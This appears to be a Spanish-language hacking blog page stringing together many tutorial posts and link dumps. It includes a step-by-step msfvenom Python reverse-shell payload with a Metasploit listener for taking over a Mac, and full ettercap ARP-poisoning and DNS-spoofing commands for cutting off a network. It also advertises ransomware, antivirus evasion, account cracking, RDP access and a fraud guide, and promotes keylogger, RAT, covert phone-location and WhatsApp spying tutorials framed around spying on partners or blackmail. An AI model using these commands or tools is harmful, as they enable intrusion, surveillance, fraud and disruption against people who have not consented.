TUTORIAL - Mostrar el mando de juego de tu pc en tu transmisión con Gamepad viewer y streamlabs OBS
Este tutorial muestra como, mediante el uso de una pagina web denominada Gamepad viewer y streamlabs obs desde tu pc. Por favor dale like al video y suscríbete al canal para mas tutoriales de este tipo. ¿ tienes alguna sugerencia o alguna pregunta? déjala abajo en la caja de comentarios.
TUTORIAL: Como Empezar a Minar Dogecoins en menos de 5 minutos en tu PC fácil y rápido en Windows (con CPU o GPU) (PARA NOOBS)
Hola de nuevo a todos los lectores de este blog. El día de hoy he realizado un video en el cual muestro como podemos comenzar a minar nuestros propios dogecoins, de tal manera que puedas conseguir los tuyos propios sin tener que comprarlos, sino solo con la fuerza de tu pc. Esperamos que el tutorial sea de tu agrado y te suscribas al canal de Youtube para ayudarme a crecer. muchas gracias por tu atención.
1) Primero debes descargar el software necesario Awesome miner.
2) Tras esto deberás instalarlo y abrirlo.
3) add new miner --> manager profile miner
4) Ponemos nombre al minador y seleccionamos nuestro profile (GPU o CPU)
5) damos finalizar y a continuación vemos como el minador es creado. Luego lo seleccionamos y vamos a la casilla de la barra superior que dice " opciones".
6) Click en la barra lateral izquierda en Profit switching y luego chuleamos Zergpool. Tras esto, ponemos nuestra dirección de Dogecoin en el formulario que vemos a continuación de Zergpool y le damos aceptar.
7) clic en la barra lateral izquierda en online services, seleccionamos todo slos servicios de Zergpool y le damos al boton que dice "bulk" que esta abajo a la derecha. Allí, chulearemos la casilla que dice "nueva constraseña" y pondremos en el formulario a continuacion la siguiente linea:
c=DOGE
8) En la barra baja a la derecha click en profile switching y verificar que todos los algoritmos están chuleados. si no lo están dar click en Select all.
9) Tras esto click derecho sobre el minador creado y dar click en el botón verde que dice Start. Si todo ha salido bien, el proceso de minado comenzara automáticamente.
Tutorial - ¿Es posible hackear un MAC OS con Metasploit?
1) Enciende tu Kali y abre un terminal.
2) Escriba
msfvenom -p python/meterpreter/reverse_tcp LHOST=(tu ip) LPORT=4444 > pyterpreter.py
Ahora pyterpreter.py debería aparecer en su carpeta de inicio
3) Abra un nuevo terminal e inicie Metasploit escribiendo msfconsole y presione Enter. Necesitamos configurar un oyente para que cuando el script se ejecute en la computadora Mac se conecte instantáneamente a nuestra máquina de ataque.
msfconsole
4) En el nuevo terminal, escriba en uso multi/manejador y presione Enter
5) Ahora tenemos que configurar el PAYLOAD, el LHOST que es la dirección IP del atacante y el LPORT que es el puerto en el que queremos escuchar. Puede hacerlo ejecutando los siguientes comandos consecutivamente.
Establecer PAYLOAD python / meterpreter / reverse_tcp
conjunto LHOST (tu ip)
conjunto LPORT 4444
6) Para iniciar el controlador, ingrese este comando
exploit -j -z
7) Ahora envíe el archivo pyterpreter.py a la máquina Mac y ejecútelo.
Ingrese la sesión de comando -i 1 y presione Enter. Ahora debería poder interactuar con la máquina Mac.
¿Cómo puedo hacerlo?
Este comando simplemente significa "enviar una sesión bash interactiva a la dirección IP (tu IP) en el puerto TCP 4444."
Ataque de denegación de servicios (Denial of Services) - TUTORIAL +18
Créditos a ᏉᎥᏒᏬፚ del grupo DARKCODE 2.0 por la información
NO HAGAS ESTE ATAQUE CON MAQUINAS O REDES QUE NO SEAN TUYAS O NO TENGAS EL PERMISO DE USARLAS, PUEDE TRAER CONSECUENCIAS.
Un ataque de denegación de servicios (DoS) es un ataque básico que puede traer varias consecuencias se lo lleva a la acción. Podemos ver un claro ejemplo de este ataque en el año 2013 donde el ataque de una empresa inundo la red de correos basura produciendo la ralentización general de internet e incluso tuvo consecuencias tales como afectar puntos claves como el nudo central de Londres.
El objeto primordial de un ataque de denegación de servicios es negar el acceso a determinados servicios como lo es web, correo y el acceso remoto o una denegación del servicio total de un sistema. La caracterización es la inundación de una red con trafico basura, haciendo las conexiones más lentas y bloqueándolas totalmente interrumpiendo la comunicación entre máquinas.
DoS.png
Para realizar este ataque tenemos que usar una herramienta primordial llamada ettercap. Para empezar usaremos nuestro sistema operativo Kali Linux donde explicare paso por paso DoS.
Primero:
Abrimos nuestra terminal de comandos en Kali Linux donde vamos a verificar si tenemos instalado ettercap y la versión que estamos usando, usualmente viene instalada en el sistema operativo. Para eso en la línea de comandos escribimos:
~# ettercap -v
etter_v.png
En tal caso que no se tenga instalado podemos instalarlo con el comando:
~# sudo apt-get install ettercap
Segundo:
Usamos los comandos del programa ettercap para tener un hombre en el intermediario o “Man in the Middle” con los siguientes comandos:
~# ettercap -T -q -M arp:remote -i eth0
Donde
-T significa texto solo en la interfaz.
-q significa silencio para no mostrar el contenido del paquete.
-M realizar un ataque mitm.
arp:remote Envenenar la tabla ARP
-i para elegir la interfaz de red; en mi caso es eth0
En nuestra terminal tendríamos lo siguiente:
ettertqm.png
Y ya tendríamos nuestro ataque casi listo!
Tercero:
Tal cual como vamos a redireccionar todo el trafico a una sola IP tenemos que escoger alguna IP de una pagina web donde podamos redireccionar todo el trafico de red a la misma IP. En este caso vamos a usar la pagina web corgi orgy para hacer la prueba.
Para esto tenemos que usar en nuestra linea de comandos la herramienta nslookup:
~# nslookup https://corgiorgy.com
Esta herramienta nos ayudara a sacar la IP de dicha pagina web.
nslookup.png
Cuarto:
Una vez ya obtenida la IP vamos a ponerla en un archivo de ettercap llamado etter.dns este archivo lo podemos encontrar en /etc/ettercap/. Lo que básicamente haremos sera poner la IP para señalar donde nosotros vamos a redirigir todo el trafico de red. Para entrar a esta carpeta usamos los comandos:
~# cd /etc/ettercap/
Ya una vez estado en la carpeta ettercap vamos a listar la carpeta para ver que archivos hay donde nosotros vamos a encontrar nuestro archivo etter.dns - Para listar los archivos usaremos el comando:
~# ls
y encontraremos algo como esto:
etcetter.png
Para editarlo podemos usar cualquier editor de texto donde en mi caso usare vim. Para usar vim y editar el archivo usaremos el comando:
vim etter.dns
Nos aparecerá esto:
etterdns1.png
TIPS PARA VIM
1 Para poner la tabla de números que aparecen en la imagen anterior presiona la tecla ESCAPE y escriba set nu
2 Para editar el archivo presione la tecla I para poder hacer algunos cambios en el archivo que veremos después.
3 Para guardar presione la tecla ESCAPE y escriba :w
4 Para salir escriba ESCAPE y :q!
Después de los pequeños tips nos dirigimos a la linea numero 59 y para redirigir el trabajo ponemos el asterisco (*) y la IP a la que se va a redirigirse.
etterdns3.png
Y guardamos. Debemos que tener en cuenta que todo este correcto en el archivo recuerden de escribir bien el asterisco (*) la letra A y la IP.
Quinto:
Una vez guardado nuestro archivo nos vamos de nuevo a nuestro programa ettercap donde debería estar corriendo y presionaos la tecla P para mirar las opciones. Nos aparecerá esto:
options.png
Ya estando ahi vamos a escribir:
dns_spoof
En este momento comenzara nuestro ataque!
poof2.png
En este momento todo el trafico que se este usando en la red donde estamos conectados a internet se ira a la IP que nosotros decidimos colocar, se ha denegado el acceso y las maquinas no podrán navegar a las paginas web al menos si es la pagina web que nosotros decidamos llevar el trafico.
Podemos ver que nuestras víctimas no tendrán acceso a internet y tendera que redirigirse a otro lugar.
error.png
El ataque esta completo.
Para acabar el ataque cuando nuestra herramienta ettercap este corriendo presionaremos la tecla Q para salir apropiadamente. En tal caso el ataque seguirá corriendo.
Ya cuando salgamos nos aparecerá esto:
done.png
Esto fue un ataque DoS.
Si alguien tiene alguna sugerencia, feedback, critica o quiere otro tutorial déjenme saber en los comentarios todos son bienvenidos a comentar y recuerda NO HAGAS ESTE ATAQUE CON MAQUINAS O REDES QUE NO SEAN TUYAS O NO TENGAS EL PERMISO DE USARLAS, PUEDE TRAER CONSECUENCIAS.
MEGAPOST: Hacking Básico y tutoriales de seguridad informática
Hola a todos los amigos, suscriptores y anons del blog. En esta ocasión vengo a traer a ustedes una compilación épica en forma de MEGAPOST de links de informática y de links que les serán muy útiles a la hora de testear sus habilidades como hackers, además de aprender un poco más sobre este mundo y todo lo que conlleva. Muchas gracias al grupo en Whatsapp de el club del hacker por haber recopilado los links.
⚡️ Los mejores sitios para testear su skills de hacking ⚡️
https://google-gruyere.appspot.com/
https://www.hackthissite.org/pages/index/index.php
https://www.hellboundhackers.org/
➖ Créditos: Assassin Hacker ➖
Ethical-hacking-from-scratch-to-advanced-technique by FMUdemyExpert
Udemy - CyberSecurity Collection
KaliLinux Complete Training Program From Scratch Course
Udemy - BugBounty Hunting Guide To an Advanced Earning Method
Udemy-Learn Ethical Hacking From Scratch
EthicalHacking With Python, JavaScript and Kalilinux
Dedsec All Courses❤️
🔰BlackHat Hacking Course By DedSec🔰
🔰Antivirus Evasion Course By DedSec🔰
🔰Complete Course Of Android Hacking By DedSec🔰
🔰Complete Course Of Kali Linux By DedSec🔰
🔰Complete Course Of WiFi Hacking By DedSec🔰
🔰ERC Course By DedSec🔰
🔰Facebook And Instagram Hacking Course By DedSec🔰
🔰Online Account cracking Course By DedSec🔰
🔰Reverse Engineering Course By DedSec🔰
🔰Dedsec Latest Fud Ransomware🔰
🔰Spamming Course 🔰
Hacking Etico - Viruses y Troyanos para Sistemas Operativos
💥 Programas de espionaje
💥 Face-Hack
💥 Mediante-Phishing
💥 Fuerza Bruta
Entrenamiento para la Certificación de Red Hat RHCSA
Hacking Ético y Pentesting Avanzado
☁💉 Pentesting con SQLMAP - Master en SQL Injection Hacking sobre base de datos 💉☁
Links de hacking I II III IV V VI VII
🖇️ Nombre: Ingeniería Social para Pentester
🖇️ Peso: 1.22 GB
🖇️ Idioma: Español
🖇️ Formato: MP4 viene en rar
🖇️ Duración: 3 Horas
🖇️ Descripción: ¿Qué es exactamente? En su sentido más amplio, la Ingeniería Social se basa en la manipulación psicológica, es decir, intenta lograr que las demás personas hagan las cosas que uno quiere que hagan. Se basa en la interacción humana y está impulsada por personas que usan el engaño con el fin de viol4r los procedimientos de seguridad.
🖇️ A pedido de un man.
Club Java Master: De Novato a Experto
DESCARGA ACRONIS
======{{👨🏻💻Soluciones Informática))=====
Link: I
Pass: ALFAELCRACK
Créditos para ALFAELCRACK
Algunos libros de programación
JavaScript de 0 con 60 ejercicios
Curso de bash scripting y automatización de procesos
Deep web. Tor freenet y i2p privacidad y anonimato
Curso basico de ethical hacking
GRAN PAQUETE DE CURSOS Y TUTORIALES
☣️BEST RDP SITE WITH 80,000+ RDPs
🏴☠️FRAUD BIBLE 2019, 75,600+ ITEMS, 40GB
Password: Blackhatpakistan
➖➖➖➖➖➖➖➖➖➖➖➖➖➖
🔘CCNA Security Latest Course Download
🔘CCNA Wireless Latest Course Download
🔘CCNA Service Provider Latest Course Download
🔘CCNA Cyber Ops Latest Course Download
🔘CCNA Data Center Latest Course Download
🔘CCNA Routing and Switching Latest Course Download
🔘CCNA Cloud Latest Course Download
🔘CCNA Collaboration Latest Course Download
Inteligencia Artificial (Python)
HERRAMIENTA PARA RECUPERAR ARCHIVOS DEL SISTEMA
#robothack:
* Caza recompensas de errores: guía para un método avanzado de ganancias *
* Bug Bounty: Hacking Android *
* Burp Suite Bug Bounty Web Hacking desde Scratch *
Para que se entretengan un poco
1: Administración de sistemas operativos
2: Administración de sistemas operativos
6: Anatomía ataque informático
15: Auditorías Wed By aletinte
43: Desarrollo de software By Aletinte
47: Diseño-Desarrollo honeypost
CURSO DE RESPONSIVE WEB DESING
LIBRO DE AMENAZAS INFORMÁTICAS
MEGA PACK DE LIBROS , REDES E INFORMATICA
Caza recompensas de errores: guía para un método avanzado de ganancias
* Bug Bounty: Hacking Android *
* Erup Suite Bug Bounty Web Hacking desde Scratch *
Para que se entretengan un poco 1: Administración de sistemas operativos
2: Administración de sistemas operativos
6: Anatomía ataque informático
15: Auditorías Wed By aletinte
43: Desarrollo de software By Aletinte
47: Diseño-Desarrollo honeypost
CURSO DE RESPONSIVE WEB DESINGN
LIBRO DE AMENAZAS INFORMÁTICAS
MEGA PACK DE LIBROS , REDES E INFORMATICA (REPETIDOS)
🧠Conocimiento informatico.
Invierte tiempo en ti mismo y no te desesperes.
⭐️La paciencia es la clave del exito⭐️.
1: Administración de sistemas operativos
2: Administración de sistemas operativos
6: Anatomía ataque informático
15: Auditorías Wed By aletinte
43: Desarrollo de software By Aletinte
47: Diseño-Desarrollo honeypost
INTRODUCCIÓN A CIBERSEGURIDAD II III IV
MEGAPOST: ¿Qué es el Bitcoin y como puedo ganar Bitcoin gratis sin invertir?
Tutorial - Instalar Wifite en Termux
Como cambiar la resolución de pantalla de Kali linux
Para cambiar la resolución usaremos el comando “xrandr” (X Resize & Rotate), ejecutamos:
root@kali:~# xrandr
Screen 0: minimum 64 x 64, current 1024 x 768, maximum 32000 x 32000
VBOX0 connected 1024×768+0+0 0mm x 0mm
1024×768 60.0*+ 60.0*
1600×1200 60.0
1440×1050 60.0
1280×960 60.0
800×600 60.0
640×480 60.0
Esto nos mostrará las resoluciones que podemos elegir, usando la opción –help podréis saber más sobre este comando.
Fuego creamos el nuevo modo que queremos aplicar
root@kali:~# xrandr –newmode “1368x768_60.00” 85.25 1368 1440 1576 1784 768 771 781 798 -hsync +vsync
Vemos si esta ya creada la nueva resolución
root@kali:~# xrandr
Screen 0: minimum 64 x 64, current 1024 x 768, maximum 32000 x 32000
VBOX0 connected 1024×768+0+0 0mm x 0mm
1024×768 60.0*+ 60.0*
1600×1200 60.0
1440×1050 60.0
1280×960 60.0
800×600 60.0
640×480 60.0
1368x768_60.00 (0x154) 85.2MHz
h: width 1368 start 1440 end 1576 total 1784 skew 0 clock 47.8KHz
v: height 768 start 771 end 781 total 798 clock 59.9Hz
La ubicamos
root@kali:~# xrandr –addmode VBOX0 1368x768_60.00
root@kali:~# xrandr
Screen 0: minimum 64 x 64, current 1024 x 768, maximum 32000 x 32000
VBOX0 connected 1024×768+0+0 0mm x 0mm
1024×768 60.0*+ 60.0*
1600×1200 60.0
1440×1050 60.0
1280×960 60.0
800×600 60.0
640×480 60.0
1368x768_60.00 59.9
Y la aplicamos
root@kali:~# xrandr –output VBOX0 –mode 1368x768_60.00
Tutorial - Enviar mensajes de Whatsapp de manera automática a varios contactos - Bulk Whatsapp
Envía mensajes ilimitados a múltiples números a la vez en whatsapp.
Tutorial - Exploit Windows 7/8/10 usando VJ-RAT vb.net - Troyano en accion
Tutorial: Sobrepasar Windows Defender y otros antivirus
Tutorial - Ardamax Keylogger
Ardamax Keylogger es un keylogger compacto, asequible, pero notablemente potente y flexible, destinado a la supervisión integral de las actividades de los usuarios en cualquier computadora en la que esté instalado. Operando silenciosamente en segundo plano, este software de monitoreo registra cada pulsación de tecla en el sistema del usuario y guarda todas las entradas en un archivo de registro cifrado confiable accesible exclusivamente para el administrador.
Tutorial: Cómo enviar mensajes de texto SMS gratis con Gmail y Chrome a cualquier celular.
Tutorial SQL Injection - Como Usar SQLMap
En el dia de hoy traemos para los lectores del blog una introducción a lo que es el sql injection y a como usar la herramienta open source, SQLmap para poder realizar las tareas de pentesting que debemos realizar. Sin más aquí dejamos el tutorial y si tienen alguna pregunta o comentario no olviden dejarlo abajo en la caja de comentarios. Hasta luego y buen hacking.
Tutorial: Geolocalización de celulares de alta precisión con Seeker y Ngrok en Parrot OS
Seeker alberga un sitio web falso en el servidor Apache y utiliza Ngrok para generar un enlace SSL que solicita el permiso de ubicación en el celular mediante un link y, si el usuario lo permite en su celular, podemos obtener:
¿Como hackear whatsapp? - 3 Formas en las cuales los hackers pueden hackear tu whatsapp
Hola a todos. ¿Es posible hackear whatsapp? El dia de hoy vengo a traer este post que muestra 3 maneras en las cuales los hackers pueden hacer uso de herramientas predeterminadas para hackear tu whatsapp. Esto lo hace la gente ya que muchas personas quieren espiar a su pareja, o se puede usar para hacer chantajes a un objetivo determinado.